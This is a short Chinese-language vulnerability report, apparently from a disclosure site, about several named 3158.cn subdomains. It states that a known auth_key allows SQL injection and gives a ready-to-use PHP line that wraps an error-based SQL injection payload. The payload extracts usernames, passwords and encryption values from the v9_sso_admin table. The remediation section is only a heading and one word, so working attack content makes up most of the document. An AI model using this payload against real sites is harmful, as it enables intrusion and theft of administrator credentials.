站点大概有:涛涛电脑知识网
zx.sichuan.3158.cn
zx.hlj.3158.cn
zx.henan.3158.cn
zx.ln.3158.cn
zx.guangzhou.3158.cn
zx.jiangsu.3158.cn
等
直接下载
得知 auth_key 后,可以造成多处SQL注入。
die(sys_auth(sys_auth("1' and (select 1 from(select count(*),concat(0x7c,(select concat(username,0x7c,password,0x7c,encrypt) from v9_sso_admin limit 0,1),0x7c,floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)#\tp",'ENCODE',$auth_key )));
修复方案:
配置
